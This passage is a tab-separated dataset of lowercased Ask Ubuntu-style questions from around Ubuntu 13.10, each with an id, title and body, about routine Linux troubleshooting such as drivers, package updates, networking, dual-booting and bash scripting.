375373	guitar rig and m-audio ft 2 recording and play guitar	is it possible to use the m-audio fast track 2 without delay ? will it work ? thanks .
375374	hud in 13:10 no longer returns out of focus applications or system commands	i upgraded to 13:10 having run 12:04,12:10 and 13:04 and now the hud is not entries from out of focus applications or , more importantly for me , system commands such as lock , suspend etc . is this expected behaviour ? is there any way to change it back ?
375375	ibus does n't work in most applications -- problem caused by ubuntu 's customizations to package ?	i just installed ibus ( and restarted , yes ) . i 've tested it so far in firefox , sublime text 2 , and kate . it only works in kate . the behavior i 've encountered sounds very much like this : https : //bugs.launchpad.net/ubuntu/+source/ibus/+bug/1007423 down in comment # 12 , @ rik.shaw said : in summary for this first issue , it is whatever ubuntu is customizing that is causing a great headache for ibus users . stock ibus from debian works much better ! however , i 'm not sure how to test that information . that is , i only know how to apt-get install things -- i do n't know how to install `` stock ibus from debian '' instead ... ? ( or perhaps someone knows of a different fix anyway ... ? )
375376	problem in updates	this problem is already mentioned . but yet to get good solution . i observed `` a problem occurred while checking for updates '' the red circle with white line . i also get the following : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'et/aims/sagemath/ubuntu ' is not known on line 3 in source list /etc/apt/sources.list.d/aims-sagemath-precise.list' does not work in my case . sudo ppa-purge -purge the-board-team/dev-snapshots [ sudo ] password for santanu : sudo : ppa-purge : command not found
375388	what lenses for unity on ubuntu 13.10 are available ?	since a lot has changed since this question was asked : what lenses for unity are available ? and many of these lenses are not compatible with latest version 13.10 . i believe many of us would like to see an updated list of available lenses for 13.10 . can we get an updated list of lenses ?
375389	ubuntu 13.10 keeps freezing frequently	i have a huge problem since i 've updated to ubuntu 13.10 . previously this problem did not occur with ubuntu 12.04 lts and later with 13.04 ( though with 13.04 and 13.10 there 's also a problem with ntfs partitions mounting ) . my computer freezes very frequently . every 2-3h of work i need to power-cycle it . it is very frustrating to be honest . i have no idea why is this happening . i 'm running a sony vaio vpc-f11m1e and have windows 8.1 as my primary system . my question is : how can i avoid it ? what files do you need to help me ? any log files required ? beer for anyone who will help me . maybe should i return to 12.04 lts ?
375390	network install ubuntu	i 'm going to install server without usb disk or cdrom via pxe with ubuntu . currently , i have prepared a server with centos complete with dhcp , and tftp server . i have successfully installed centos via network . but i 'm stuck with ubuntu . i have copied linux file under netboot and initrd to tftpboot . boot from it , but unfortunately when the system is up , it failed to auto-configure my eth0 , i have no idea since it was fine with centos . also it was asking for mirror archive . what i want is to install it from my local server ( nfs ) . does any one have the similar issue as me and how to solve it ? thank you .
375391	13.10 - opening webapps creates duplicate firefox entry on launcher	i have ubuntu 13.10 with the amazon and gmail webapps installed . now , when i go to dash and click on amazon , a firefox window opens and both a firefox and an amazon icons get added to the launcher . now , when i try to open gmail from the dash , only a firefox icon gets added to the launcher but the gmail is nowhere to be seen . is this how the webapps are supposed to how work ? how can i make the webapps to use their icons exclusively and not the firefox icon
375392	can we have a real terminal connected to an ubuntu pc now-days	and how do we deal with it since we only have virtual terminals ? ? btw what are virtual terminals for ? apart from logging into them when your gui freezes ?
375394	why does this bash script not work ?	when i run the following command ./command * using this script # ! /bin/bash for f in ./ $ 1 do echo $ f done only the first file specified in $ 1 is echoed . my question is why ?
375395	bash : get current working directory name , but not full path	i know that pwd will print the full path of current working directory , but i want to print only the name of the directory . is there a simple command to do this without to parse pwd ?
375398	iq 504 compatibility issues ( sound , cddvd drive , microphone , etc.. )	i 'm quite new to ubuntu , and it 's inner-workings , so i have n't gotten very far trying to figure out solutions for the problems i 'm having . i tried running a search for additional drivers , but i came up empty handed . after searching through various questions on here , and through google and not finding an answer i figured i 'd ask people who are more in tune with the operating system than i am . i 'm currently running ubuntu 12.04.3 lts ( an attempt to upgrade to 12.10 left me with a black screen with an inactive white hyphen , and a need to reinstall 12.04 altogether ) i 'm using an hp iq504 touchsmart computer , and dual-booting with windows 7 64-bit . i ran a scan with system profiler and benchmark , and have the file available to share with ubuntu one , or email to whoever is interested in helping me . ( i 'm not sure if it 's okay to post here directly . different forums , different rules . ) details : hp iq504 touchsmart desktop intel 965 express family chipset integrated graphics using nvidia geforce 9300m 2x intel ( r ) core ( tm ) 2 duo cpu t5750 @ 2.00ghz memory 4040mb ( 1839mb used ) tsstcorp cddvdw ts-t633a operating system kernel : linux 3.8.0-33generic ( x86_64 ) desktop environment gnome ( gnome ) bios date 01/16/2009 vendor american megatrends inc. ( www.ami.com ) version 5.10 board name eve vendor pegatron corporation . ( ati technologies , www.ati.com ) results for aplay -l : *** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : ad198x digital [ ad198x digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 ( it 's such a long post , but i wanted to be thorough in case i could n't respond fast enough to this post to provide further information . ) the issues i have are : no sound from speakers , only from headphones . cddvd drive accepts and ejects discs , but does not read , recognize or display the content of any , or offer any options regarding the drive at all . ( it does in windows 7 ) built in microphone or webcam is not operational either . ( i 'm not entirely sure of how to find the information pertaining to the actual hardware as it 's not stated on the manufacturer 's site . ) my touchscreen highlights when i drag my finger , but does n't scroll or manipulate the screen , it pretty much acts like a mouse while holding or pressing the left click . i 'm not sure if that 's just a feature that is n't provided though . volume buttons ( increase , decrease , and mute ) are not functional . how can i resolve these issues ?
375408	will the mobile network connection work on the nexus 7 ?	i 'm planning to buy a nexus 7 to use it as a small car pc . can you tell me , what is the current state of using the mobile broadband connection and the gps hardware of the nexus 7 in ubuntu touch ? thank you and best wishes , peter
375410	rhythmbox menu-bar is not visible	after upgrading to ubuntu 13.10 ( saucy salamander ) , rhythmbox ( 3.0.1 ) menu bar is not visible in my laptop and desktop ( office ) . any help ? ?
375412	how to make my nodes online in maas ?	my nodes are still commissioning.after i boot from network , password is needed to log in which i do n't know.i try many ways to solve this.any idea ?
375415	kubuntu energy saving event on power button pressed not working	my aspire 1810tz is running kubuntu 13.10 on an encrypted drive . i have enabled hibernation in file /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla [ re-enable hibernate by default in upower ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes [ re-enable hibernate by default in logind ] identity=unix-user : * action=org.freedesktop.login1.hibernate resultactive=yes i can hibernate and resume with sudo pm-hibernate and by using the application launcher ( `` leave - hibernate '' ) i set `` energy saving - button events handling '' to `` sleep when laptop lid closed '' and to `` hibernate when power button pressed '' ( for ac power , battery and low battery mode each ) . sleep mode works fine . when i press the power button the system shuts down / hibernates . but when switching it on again it just boots normally and has to start the open applications again . so my question : what is the difference between the event `` when power button pressed '' and sudo pm-hibernate ?
375417	logout of cli & reenter gui	my video drivers are currently still in beta , so every now and then , the desktop environment malfunctions especially when ( dis ) connecting a second monitor . thankfully , there is a way to restart the gui without having to reboot . however , tty1 is still logged in . if i try to logout of tty1 i ca n't ctrl+alt+f7 back in to the gui . how can i both restart the gui and logout of the tty that restarts the gui ?
375419	install kvm on ubuntu 13.10 server	how do i install/enable kvm on ubuntu 13.10 server ? i executed the following steps egrep -c â ( svm|vmx ) â /proc/cpuinfo sudo apt-get install qemu-kvm libvirt-bin bridge-utils virt-manager sudo adduser test1 libvirtd did not get any installation issue . but when i try to execute sudo virsh -c qemu : ///system list i 'm getting the following error error : failed to connect to the hypervisor error : can not recv data : connection reset by peer i repeated the above installation process on different machine , which is also having ubuntu 13.10 server . on this machine i 'm getting the following error error : failed to connect to the hypervisor error : failed to connect socket to '/var/run/libvirt/libvirt-sock ' : no such file or directory need help on these issues .
375421	ca n't mount cd/dvd r/w drive in ubuntu 12.04	i 'm pretty new to ubuntu and i 'm having some troubles mounting my drive or getting it to detect media . when i do this : dmesg | grep `` sr0 '' i get : [ 2.096797 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 2.096968 ] sr 5:0:0:0 : attached scsi cd-rom sr0 when i : sudo mount /dev/sr0 /mnt/cdrom mount : no medium found on /dev/sr0 sudo mount /dev/cdrom /media/cdrom mount : no medium found on /dev/sr0 there is most certainly media in the drive . can someone please help me understand how i can resolve this issue ?
375425	dual monitor problems - screen flicker and offset	i have just installed ubuntu on a dell inspiron 15 . i 'm using an amd radeon hd 7730m with the latest beta drivers installed . whenever i try to plug in a dual monitor i get incredibly bad screen flicker and my launch bar is displayed in the middle of my screen , but still responds as if it were on the left at it 's normal position . see this image . any idea what 's causing this ? could it be the beta drivers ? have i not set something up correctly ?
375428	no wlan after standby	since i use ubuntu 13.10 , i 'm experiencing a bug : i activate standby i press any key to continue working on my laptop the computer is on again , but the wlan does n't work . → the wlan network then is disabled by default , but i ca n't enable it , it does n't shows any network available .
375430	no gui with ubuntu 13.04	i no longer have a gui with ubuntu 13.04 . i can log in and use the command line , but nothing more exotic than that . is there anything i can do to fix this without resorting to a full reinstallation ? alternatively , can i upgrade to 13.10 from command line and expect everything to be fine even though there 's something amiss in my current system ?
375431	if only x server run one virtual terminal 7 how can emulators provide us with a bash window	where do they get the bash from ? does it have to be running so they can communicate with it and pass the commands to it ? also are the other virtual terminal from 1-6 are like a total separate machine ? i mean the processes on terminal 1 separated from the processes on terminal 2
375433	how to add event in ubuntu calendar ?	i tried to add an event in ubuntu 13.10 default calendar using the `` add event '' option . when i press that button , nothing happens . can anyone tell me a solution to this ?
375434	run shell command when i save in sublime-text	i 'm coding with html and each time i have to save the file and run the command line $ google-chrome fileloacation.html can i make subl do this automatically ?
375444	setting up m64py in ubuntu 12.04lts	i 've set up mupen64plus on my computer with some plugins using synaptic . i can open .z64 files with mupen64plus using terminal , but that 's as far as i can get - no controls , etc . so , i 've set up m64py with all it 's dependencies , only to find that when i open m64py , it says `` mupen64plus library not found . '' even when i point m64py to all the appropriate directories , it refuses to work . can somebody please help me ?
375445	how to disable caching in ubuntu ? does ubuntu consume more ram ?	i just viewed hacker news . there is something mentioned like `` linux ate my ram '' . how much is it true that linux consumes more ram . it will be helpful if someone can provide guide to remove cache of application . at first my pc use to boot faster than it does now . after installing many programs , i 'm facing this problem .
375447	how to install old ( esr ) thunderbird with thunderbird-gnome-support	i 'm forced to use tb 17 instead of the stable branch due to some bugs . i just downloaded and unpacked a tar from the mozilla site . so far so good . but what if i want to have the thunderbird-gnome-support ( eg . indicator-messages integration ) for that version of tb in raring ? when i try to download an old .deb file with the gnome support and install it , it ( of course ) yells about missing dependencies on tb 17 , which is not registered with dpkg .
375450	undefined reference to `memcpy @ glibc_2.14 ' : building android sdk with smartcard api support:	i am trying to build android emulator with smartcard api support . i was following this manuals : one two all steps passed ok , but when i run : pcsc_incpath= < path_to_pcsc-lite_32bit > /src/pcsc/ pcsc32_libpath= < path_to_pcsc-lite_32bit > /src/.libs/ pcsc64_libpath= < path_to_pcsc-lite_64bit > /src/.libs/ make -j32 product-sdk-sdk i have got the following error : make : *** [ out/host/linux-x86/obj/executables/emulator64-arm_intermediates/emulator64- arm ] error 1 / < my-home > /pcsc-lite-1.8.10_x64/src/.libs//libpcsclite.so : undefined reference to `memcpy @ glibc_2.14' my glib version is 2.15 : ldd -- version ldd ( ubuntu eglibc 2.15-0ubuntu10.5 ) 2.15 how can i solve this issue ? should i downgrade glibc to version 2.14 or there is any other solution ? os : ubuntu 12.04 x64
375452	problem with nvidia after update	after adding the most recent set of updates , i ca n't get into ubuntu at all . i get a screen saying that i am running in low-graphics mode , 'your screen , graphics card and input device settings could not be detected correctly etc ' . i can hit return and then get to the next screen saying 'what would you like to do ? ' however , i ca n't choose from the 4 options , the only keystroke that will register is escape , which takes me to a black screen with a login . i have an nvidia geforce 7050/nforce 610i and it has caused problems in the past , but i have always got round it by choosing to boot in recovery mode . now , no matter which version i try to boot into i ca n't get into ubuntu at all .
375455	how to shutdown a windows 7 pc from ubuntu 13.10	i want to shutdown a windows 7 pc from my ubuntu pc , is there a way to do this from terminal ?
375456	update to kernel 3.12 seems to fail : uname reports old rc7	i currently run xubuntu 13.10 with kernel 3.12 rc7 . today i tried updating to the latest 3.12 kernel ( non-rc ) , but this seems to fail . when installing the image and headers i see the following error passing by : ... run-parts : executing /etc/kernel/postinst.d/dkms 3.12.0-031200-generic /boot/vmlinuz-3.12.0-031200-generichis error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . ... after rebooting , when i do uname -r or cat /proc/version it tells me that i 'm still running on the old rc7 kernel . since my microphone was n't working on my sony vaio pro 13 i did download and install the latest alsa drivers using the oem-audio-hda-daily-dkms package which seem to fix the problem ( with the mic ) . maybe this has something to do with it ? i also tried removing the package using sudo apt-get purge oem-audio-hda-daily-dkms but no success .
375459	how to install lubuntu in asus eeepc 1005ha	i have a asus eeepc 1005ha and i 've successfully installed ubuntu and xubuntu , but since i upgraded xubuntu to 12.10 version it stopped booting , i got to grub , but after i only get a black screen with a flickering line in the top left and nothing happens . i 've been searching the internet all around since and it would seem to be a graphic card problem.at the time ( last year ) i could n't fix this . so i thought it could be a disk failure , but the disk , memory , everything passed all tests . the only os i 've been able to install and run with success since then was winxp , but only if i do n't install it in acpi hal . but that way i ca n't use wireless and , worst of all , it does n't manage my power settings or battery . i 've been trying to install ubuntu with `` nomodeset '' option , but no success.. i 'm really desperate , because i need this asus so much to finish my thesis , but i do n't wan na risk using it with winxp installed with an inadequate hal , i 'm afraid in a long term it could mess up my battery or any other hardware . if someone could help on this i would be so so thankful , please !
375460	my gnome terminal keep opening new window	i actually want to change the default window position of gnome-terminal in my ubuntu 12.04 system . after some search , i found some one else use the command gnome-terminal -- geometry=120x80+50+50 to set the default position . and i actually do n't know where to paste the command , so i pasted it to 'custome command ' field of terminal 's profile . now when i open one terminal , it just keep opening new ones and i have no way to stop it other than ctrl+c . i even removed .gconf/gnome-termial/ folder and it did n't worked . can someone help me ?
375461	how to get past gnome-control-center sound to the volume setting on the command line/shell script	i have searched this forum and the internet for hours looking for a way to get to the gnome-control-center sound - > output volume by command line so that i can put it into a script to set it on boot up as it keeps going to null no sound -- turned down all the way all i have found is how to get to the gui which is a bother to have to start up every time i boot up as well as i am setting up a conky xmms2 window which works but my volume is always turned completely down by ubuntu gnome-control-center sound settings every time i boot up -- i seen that it seems to be a bug and has been put on 'low ' concern to fit it . i have found how to set ( alsa ) amixer setting that works but it does not tie into the gnome volume settings all i can find in here is how to start up the gui by typing 'gnome-control-center sound ' to set it not by or like ( amixer -c 0 set master playback 100 % unmuteu ) which works for my mixer setting still the gnome volume is set completely to 0 ( zero ) at the same time . pulseaudio works to but in the same manner it seems that the gnome is the master of all the sound controls and it is being a little s* $ % ! in not cooperating i 've tried gnome-control-center sound -c 0 set output volume 100 % unmuteu and various other ways to try and get it to work i 've looked for the properties after the ? class 'sound ' i have not found any documentation to tell me what or how to get past the sound call to get to the volume setting itself in order to set it to what ever level i want in a shell script if anyone else knows please share as i can not find any documentation on it myself
375462	argument list too long and copying to samba share	ubuntu 12.04 lts 64 bit . i 'm trying to make a scheduled task copy from a directory with thousands of files to a samba share ( while skipping duplicates ) . i mapped my samba share through the gui . the command i tried : cp /home/security/brick/* ~/.gvfs/ '' cam on atm-bak-01.local/brick '' -n i found this but i do n't know how to change the syntax to what i need . find -maxdepth 1 -name '*.prj ' -exec mv -t ../prjshp { } + any hints are greatly appreciated .
375463	how would i launch firefox with multiple thin clients with just one log in name ?	i 'm working on a lts thin client with 1 user logon to multiple thinclient . i was able to launch two firefox with the command in linux : firefox -no-remote -p `` thinclient '' , but how would i launch firefox with multiple thin clients with just one log in name ? i do not want to create multiple login name since the thin clients i create will be in public use .
375465	install 13.10 - restart only shows dashes or unreadable screen . both 32 & 64 bit versions	i have installed both 32bit and 64 bit on my dell-531 amd64 desktop . after restart from installation , get an unreadable screen . mostly a bunch of dashes . also tried to change boot order using cli and ca n't run 'update-grub ' . get something about /cow not found .
375466	apache2 wont display a folder - while another folder works ... confused	i am on ubuntu 13.10 php5 and am an intermediate php developer exact same file ( 1.php ) in 2 diff folders - one works and the other doesnt ... http : //localhost/vetpro2/1.php the above works as intended ... http : //localhost/vetpro/1.php the latter gives error : '' forbidden - you do n't have permission to access /vetpro/1.php on this server . apache/2.4.6 ( ubuntu ) server at localhost port 80 '' web server is in /var/www and permissions are as follows : aveesh @ aveesh-asus-ubuntu : /var/www $ ls -l vetpro/1.php -rw-r -- r -- 1 aveesh www-data 1051 nov 11 09:50 vetpro/1.php aveesh @ aveesh-asus-ubuntu : /var/www $ ls -l vetpro2/1.php -rw-r -- r -- 1 aveesh www-data 1051 nov 11 09:50 vetpro2/1.php directory permissions are the same : aveesh @ aveesh-asus-ubuntu : /var/www $ ls -l drwxr-xr-x 5 aveesh www-data 4096 nov 11 17:27 vetpro drwxr-xr-x 5 aveesh www-data 4096 nov 11 14:54 vetpro2 if , instead of vetpro , i use another folder - say vetpro3 or test - everything works ! what can i do to get vetproto work ?
375468	cinnamon causes stellarium exit to log out to system login	i am running ubuntu 12.04 lts with the latest updates . also , cinnamon and stellarium with the latest updates . i can start and run stellarium just fine under cinnamon . when i exit , the system logs me out to the ubuntu login screen . when running another desktop like gnome , there is no problem . exiting stellarium does not log me out . thanks in advance .
375470	wireless network doesnt work	first sorry for my english im not speaking english normaly . im new to linux ubuntu and have just installed it . but wireless network does'nt work . i have tried to find a driver under settings > harware > other drivers , but i isnt there . and up in the menubar and network i can only see ethernet connections .
375472	xbindkeys slow on ubuntu 13.10	i am using ubuntu 13.10 64 bit on an intel 15 with 4gb of ram . i used xbindkeys for custom keyboard shortcuts in ubuntu 13.04 because it was easy to configure with the gui xbindkeys-config . now i have setup the same on ubuntu 13.10 , and even a simple operation like opening a file using gedit seems to run slow . reinstalling xbindkeys does not seem to solve the problem . anyone has any ideas on what could be done , or any alternatives that are easy to configure ?
375473	why do things change between using a livecd/liveusb and installing ubuntu ?	here have been a couple of weird experiences i 've had with a ubuntu livecd or liveusb : 1 ) i had one of the original chromebooks ( cr-48 ) . i ended up wiping chromeos and installing only ubuntu 12.04.0 just after it came out . it worked like a charm . about a year later , i broke something and reinstalled ubuntu using 12.04.3 on a liveusb . the liveusb worked perfectly - screen resolution , wifi , trackpad all worked fine . i installed it ( once installing updates , once stock from the usb drive ) and both times screen resolution , wifi , and trackpad all broke . i ended up downloading 12.04.0 and installing it then upgrading to 12.04.3 after the fact and everything worked perfectly once again . 2 ) i purchased a toshiba portege z935 and the liveusb worked perfectly , namely the wifi . after install , wifi was extremely slow and basically could n't load any pages . the answer was that bluetooth conflicted somehow with wifi and bluetooth had to be disabled to get wifi to work . yet both could be enabled in the liveusb version , no problem . so my question is , why does this happen ? why does everything work perfectly from the liveusb version but then get broken when installed on the system ? is there a different way to install ubuntu that would allow things to be installed over exactly as they were on the liveusb version ( drivers , settings , etc ) ? are there assumptions that the install makes that i could override somehow ?
375478	ethernet works with live cd , but does n't after fresh install .	i just installed 13.10 on a dell laptop . during the install process it connected to the ethernet . once install finished and i logged in for the first time i did not have ethernet . it has the broadcom bcm4401-b0 100base-tx ethernet controller . when doing ifconfig i do n't see an eth0 .
375479	error while am try to update it	w : failed to fetch http : //ppa.launchpad.net/plushuang-tw/uget-stable/ubuntu/dists/saucy/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
375485	corsair hydro i series cpu cooler fan control	i have been toying with the idea of a corsair h80i for my dual boot system ( win7/u12.10 ) and mostly use it in ubuntu . i have done some research on the interweb regarding fan control in linux and nearly ran up short until i came across this thread : http : //ubuntuforums.org/archive/index.php/t-2096166.html and it seems to have worked around it . ( although i have not tested it for myself ) is there any program/library/source that can be used to control the fans without having to macguyver it ? ?
375486	swap on ubuntu : no primary partition	i am running ubuntu 13.10 64bit on a system with 4gb ram , dual booting with windows most people say that it is good to have swap on a system , and results in speed , so i used it with my previous ubuntu installations . in my new hdd , i use 3 primary partitions : 1 for windows os ( ntfs ) , 1 for ubuntu ( ext4 ) and 1 for data ( ntfs ) . i did this so that any crashes in an os would not cause data loss the windows system also took up one primary partition for system , and i have only 4 mbr slots . effectively i have no primary partition for swap . i do not know it happened earlier , but back then i had a partition for swap as well my current disk partitioning looks like this : http : //imgur.com/ymtr879 how can i create swap in my current setup ?
375489	ubuntu touchscreen on lenovo yoga 2 pro	does anyone have any experience with ubuntu running on the yoga 2 pro in terms of the functionality of the touchscreen ?
375492	dual boot ( win 7 & ubuntu 13.10 clock problem	i 'm a `` newbie '' to ubuntu , but i 've been wrestling with this problem for several hours and do n't seem to be able to solve it : when i set the time in windows ( indianapolis , eastern u.s. time zone ) and then re-boot to ubuntu , the computer time goes to hawaiian time . when the time is set in ubuntu , and the computer is rebooted to windows the time is advanced by 5 hours . i 've set the time in the bios , and it seems to make no difference . i 've tried setting the time from `` automatic '' to `` manual '' , all with the same result . not a big problem , but it shows some underlying glitch . could anyone explain ?
375494	ubuntu 12.04.3 lts mini usb wireless not working	i just installed ubuntu 12.04.3 lts and when i ran the live cd to test it before i stalled ubuntu the wireless was working just fine . after in stall it 's not working . mini usb wireless adapter ( realtek ) any suggestions ? i 'm a first time linux user so be gentle ; - )
375502	partitions are gone	i know this question has been asked many no.of times & i 'm asking again please do n't mark it as duplicate . i had installed ubuntu 13.10 in my sister 's laptop & now ubuntu has deleted all the partitions which were there earlier in windows . now i 'm going to remove ubuntu & go back to windows . i heard there is an tool called `` testdisk '' which is also available for windows . if i intall windows & partition the drive & use `` testdisk '' application will it be able to recover all the data that was lost due to installation of ubuntu.now i 'm in desperate need for help . i hope you people can help me & save me from embracement . eagerly waiting for your responses .
375504	installing salamander along side windows 8	when the caveat box comes up ( where it should ask whether i want to install salamander along side windows 8 ) , i get only 2 selections : it says that no other o/s is installed on this hard drive ( it is the only hard drive installed ) and that i can either : -- erase the disk and install ubuntu ( warning , all existing data will be erased ) or -- something else . /// if i do choose , something else , the partition box clearly shows the existing win 8 partition , along with an `` unknown '' labled mfstres flagged partition , a recovery partition , an efi partition , and a `` push button reset '' partition -- - all labeled primary partitions . gparted and disk utilities also show the same . partition order is : sda1 = unk file system -- -- - label 120mb msftres flag sda2 = ntfs recovery 400mb diag sda3 = fat32 esp-efi 300mb boot sda4 = ntfs gateway 914.44 gb msftdata sda5 = ntfs push button reset 16.27 gb diag
375506	does the thinkpad x1 carbon mobile broadband option work with ubuntu ?	i 'm just wondering if the mobile broadband works once you install ubuntu and remove windows .
375507	i am having a blank unresponsive screen and i do n't know what 's the cause . is there any emergency procedures ?	when i came back home and turned on the pc , everything was normal : the usual texts saying ok at the end and the xubuntu loading dots . but after that the screen blinks a couple times and gives me the black unresponsive screen i mentioned . i can access the recovery mode and i tried most options in it but they were no use . is there any other things i can do ? oh and the last time it was operating normally i updated everything it asked . it was around 190 mb as i said the pc is unresponsive so the cntrl+alt+f1 does n't work but i managed to get to the root shell promt in recovery mode and enter that command . it replied with usr/sbin/lightdm
375508	fan running at full speed using xorg drivers	i 'm running my fourth fresh install of ubuntu . i 've tried using the fglrx drivers but it always results in a catastrophic failure where i login to a black screen . i 'm using the default xorg drivers but the fan is always at a continuous speed . my laptop is a dell insprion 15 and my video card is an radeon hd 7730m . how can i control the fans ?
375511	ubuntu translation in fon	i want to translate ubuntu in fon ( my language ) . the fon is most spoken language of benin . could someone let me know how i can do it ? thanks .
375512	is league of legends playable on ubuntu 13.10 ?	its been my main game since season 2 of it and i just switched to linux and i wondered if its possible to play games league of legends on ubuntu 13.10 ? if possible can someone explain me how to or link me some tutorial for 13.10 ubuntu ! thanks in advance hp probook 4535s
375515	how do i know where ( from which directory ) the process is commanded ?	i am running a simulation that is commanded to begin at some directory , but do n't remember from which directory i commanded the simulation . i 'm using python for running the simulation , so ps aux | grep pid only shows where the executing program is located . ( /usr/bin/python ) . however , i want to know where the command is operated from the very initial point , where the file i 'm running is located . i would greatly appreciate any helpful comments ! thanks : )
375518	i can not update ubuntu 13.04 due to this error	i m using ubuntu 13.04 for my pc , since a week i ca n't update it showing the following error in terminal : e : unable to parse package file /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_raring-updates_universe_i18n_translation-en ( 1 ) , e : problem opening /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_raring-backports_main_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . help me to resolve this error..
375520	ubuntu 13.10 installation issues - graphical artifacts after ubuntu boot screen ( amd graphics )	i am having difficulty installing ubuntu from both usb or dvd . when i attempt to boot into ubuntu live , or oem install , i get through the loading screen , the mouse appears in the middle of the screen , and then i get static that fills the screen . i 'm not sure what is going on , but below is an image to show you exactly what i am seeing , and i am listing the specs of the system below . edit : i have removed all but one of my displays as well , and i get past the snow , but the second image on the photo stream . thanks ! ~r0dn3y images specs : cpu - core i7-3970x ram - 32gb ddr3 1866 gpu - 2x amd radeon 7990 ( one disabled , no cf bridge )
375523	computer to computer networking through rj45 on ubuntu 13.10	how can i connect two ubuntu 13.10 installed laptop through network cable ( rj45 ) . i tried ad-hoc but not working !
375525	no maximize title bar button in many application windows .	i can not find maximize title bar button in many application windows.when i first installed ubuntu everything worked fine . i donât know what happened , but now there is no way to maximize windows . this issue comes when it is fully-maximized . but when it is normal , i can see the background and unity . ( too small ) when i press alt + space , it gives me the option to put it back to normal . i work with it . title bar and the buttons are missing . how to resolve this ? thank you !
375528	wifi drops out after short duration . can not find answer already here . ubuntu 13.10 on hp compaq cq58	do you know the firmware i have to install or something for this new model laptop ? carlos @ carlos-compaq-cq58 : ~ $ sudo lspci -nnk | grep net -a2 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : hewlett-packard company device [ 103c:1885 ] kernel driver in use : r8169 carlos @ carlos-compaq-cq58 : ~ $ carlos @ carlos-compaq-cq58 : ~ $ ifconfig eth0 link encap : ethernet hwaddr 88:51 : fb : c8 : f2:3a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1356 errors:0 dropped:0 overruns:0 frame:0 tx packets:1356 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:140096 ( 140.0 kb ) tx bytes:140096 ( 140.0 kb ) usb0 link encap : ethernet hwaddr d6 : fe : db : fe : ad:06 inet addr:192.168.42.141 bcast:192.168.42.255 mask:255.255.255.0 inet6 addr : fe80 : :d4fe : dbff : fefe : ad06/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:74389 errors:26 dropped:0 overruns:0 frame:26 tx packets:45038 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:106485869 ( 106.4 mb ) tx bytes:5538290 ( 5.5 mb ) wlan0 link encap : ethernet hwaddr f4 : b7 : e2 : c3 : e0:17 inet addr:192.168.130.3 bcast:192.168.130.255 mask:255.255.255.0 inet6 addr : fe80 : :f6b7 : e2ff : fec3 : e017/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3867 errors:0 dropped:0 overruns:0 frame:0 tx packets:65 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:496581 ( 496.5 kb ) tx bytes:12288 ( 12.2 kb ) lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] wrestler [ radeon hd 7310 ] 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] wrestler hdmi audio 00:11.0 sata controller : advanced micro devices , inc. [ amd ] fch sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices , inc. [ amd ] fch smbus controller ( rev 14 ) 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd ] fch lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd ] fch pci bridge ( rev 40 ) 00:15.0 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 0 ) 00:15.1 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 1 ) 00:15.3 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 3 ) 00:16.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:16.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 7 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. 